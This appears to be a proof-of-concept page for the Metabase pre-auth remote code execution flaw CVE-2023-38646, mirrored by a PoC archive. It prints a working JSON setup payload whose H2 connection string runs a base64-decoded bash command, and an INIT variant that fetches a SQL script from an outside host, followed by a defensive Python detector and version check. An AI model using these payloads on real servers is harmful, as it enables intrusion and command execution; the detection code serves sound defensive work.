Related vulnerability
Title:
Metabase security vulnerability
(CVE-2023-38646)
Description: Metabase is an open-source data analytics platform from the US company Metabase. Metabase versions before 0.46.6.1 and Metabase Enterprise versions before 1.46.6.1 contain a security vulnerability that allows an attacker to execute arbitrary commands on the server with the privileges of the account running the service.
Description
Metabase postgres (org.h2.Driver) RCE without INIT
Introduction
### Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained [here](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/)
This helped me avoid "database already in use" errors (with H2 and Postgres as engines):
```json
{
  "token": "TOKEN",
  "details": {
    "is_on_demand": false,
    "is_full_sync": false,
    "is_sample": false,
    "cache_ttl": null,
    "refingerprint": false,
    "auto_run_queries": true,
    "schedules": {},
    "details": {
      "advanced-options": true,
      "classname": "org.h2.Driver",
      "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
      "subprotocol": "h2"
    },
    "engine": "postgres",
    "name": "x"
  }
}
```
Instead of using H2 directly as the engine with the INIT script (INIT has been removed from our queries), the engine is set to `postgres` while the connection details still point at the H2 driver, so the H2 database query is still used.
<details>
<summary>INIT script</summary>
<code>mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'</code>
<h3>In the .sql you specify the way to exec shell commands</h3>
</details>
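From the defender's side, both variants above share a recognisable shape: a database-setup request whose connection details name `org.h2.Driver`, whose declared engine does not match those details, and whose JDBC connection string carries `INIT=RUNSCRIPT` or an inline `CREATE TRIGGER ... $$//javascript` body. The Python below is an added example, not part of the original PoC or of Metabase: it checks a running version against the fixed releases named on this page (0.46.6.1 and 1.46.6.1) and flags request bodies that carry those indicators. The sample request bodies, the placeholder connection strings and the helper names (`inspect_setup_request`, `is_vulnerable_version`) are constructed here; the `db` field is assumed as an alternative place for an H2 connection string.

```python
import json
import re
from typing import Any, Iterator, Optional, Tuple

# Fixed releases as stated on this page: 0.46.6.1 (OSS line) and 1.46.6.1 (Enterprise line).
FIXED_VERSIONS = {0: (0, 46, 6, 1), 1: (1, 46, 6, 1)}

# Indicators of an H2 JDBC connection string being abused for code execution.
# Covers the original INIT=RUNSCRIPT vector and the no-INIT inline-trigger variant.
SUBNAME_PATTERNS = [
    re.compile(r"INIT\s*=", re.I),
    re.compile(r"RUNSCRIPT", re.I),
    re.compile(r"CREATE\s+TRIGGER", re.I),
    re.compile(r"\$\$\s*//\s*javascript", re.I),
    re.compile(r"Runtime\.getRuntime\(\)", re.I),
    re.compile(r"TRACE_LEVEL_SYSTEM_OUT", re.I),
]


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn 'v0.46.5' / '1.46.6.1' into a 4-component integer tuple for comparison."""
    nums = tuple(int(p) for p in re.findall(r"\d+", version))
    if not nums:
        raise ValueError(f"no numeric components in version {version!r}")
    return nums + (0,) * (4 - len(nums))


def is_vulnerable_version(version: str) -> bool:
    """True when the version sits below the fixed release of its own line (0.x or 1.x)."""
    parts = parse_version(version)
    fixed = FIXED_VERSIONS.get(parts[0])
    if fixed is None:
        return False  # assumption: unknown major line is not covered by this check
    return parts < fixed


def _walk(obj: Any, engine: Optional[str] = None) -> Iterator[Tuple[dict, Optional[str]]]:
    """Yield every dict in the body together with the nearest enclosing 'engine' value."""
    if isinstance(obj, dict):
        engine = str(obj.get("engine", engine)) if "engine" in obj else engine
        yield obj, engine
        for value in obj.values():
            yield from _walk(value, engine)
    elif isinstance(obj, list):
        for item in obj:
            yield from _walk(item, engine)


def inspect_setup_request(body: str) -> list:
    """Return human-readable findings for one database-setup request body (empty = clean)."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    findings = []
    for node, engine in _walk(data):
        classname = str(node.get("classname", ""))
        subprotocol = str(node.get("subprotocol", "")).lower()
        uses_h2 = "org.h2.Driver" in classname or subprotocol == "h2"
        if uses_h2:
            findings.append("H2 JDBC driver requested in connection details")
            if engine and engine.lower() != "h2":
                findings.append(f"declared engine '{engine}' does not match H2 driver details")
        # 'subname' is the JDBC string for advanced options; 'db' assumed as the plain-form field.
        conn = " ".join(str(node.get(k, "")) for k in ("subname", "db"))
        for pat in SUBNAME_PATTERNS:
            if pat.search(conn):
                findings.append(f"connection string matches {pat.pattern!r}")
    return findings


def is_suspicious(body: str) -> bool:
    return bool(inspect_setup_request(body))


# Constructed sample bodies (placeholders instead of real hosts or commands).
BENIGN_REQUEST = json.dumps({"token": "TOKEN", "details": {"engine": "postgres", "name": "prod",
    "details": {"host": "db.internal", "port": 5432, "dbname": "app", "user": "metabase"}}})
SUSPICIOUS_REQUEST = json.dumps({"token": "TOKEN", "details": {"engine": "postgres", "name": "x",
    "details": {"advanced-options": True, "classname": "org.h2.Driver", "subprotocol": "h2",
        "subname": "mem:x;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER t BEFORE SELECT ON "
                   "INFORMATION_SCHEMA.TABLES AS $$//javascript\nPLACEHOLDER\n$$--"}}})
INIT_REQUEST = json.dumps({"token": "TOKEN", "details": {"engine": "h2", "name": "x",
    "details": {"db": "mem:test;INIT=RUNSCRIPT FROM 'http://PLACEHOLDER/sqlcmd.sql'"}}})

if __name__ == "__main__":
    for label, body in [("benign", BENIGN_REQUEST), ("inline trigger", SUSPICIOUS_REQUEST),
                        ("INIT script", INIT_REQUEST)]:
        print(label, "->", inspect_setup_request(body) or "clean")
    for v in ("v0.46.5", "1.46.6", "0.46.6.1", "v1.47.0"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed")
```

The version check is a triage aid, not proof of exploitability: the setup token must also be reachable for the pre-auth path described in the linked write-up, so on a vulnerable build the first action is to upgrade and, until then, to alert on any `/api/setup/validate` or database-creation request whose body trips `inspect_setup_request`.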
# REFERENCE
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase
### Written as a note; take it as rough documentation. You must have authorization to enumerate, exploit, or simply test against any target.
## Comments and contributions are welcome
File snapshot
[4.0K] /data/pocs/e2730023118d3c2ebdabfc95a7db278e2aa89c77
└── [1.4K] README.md
0 directories, 1 file
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.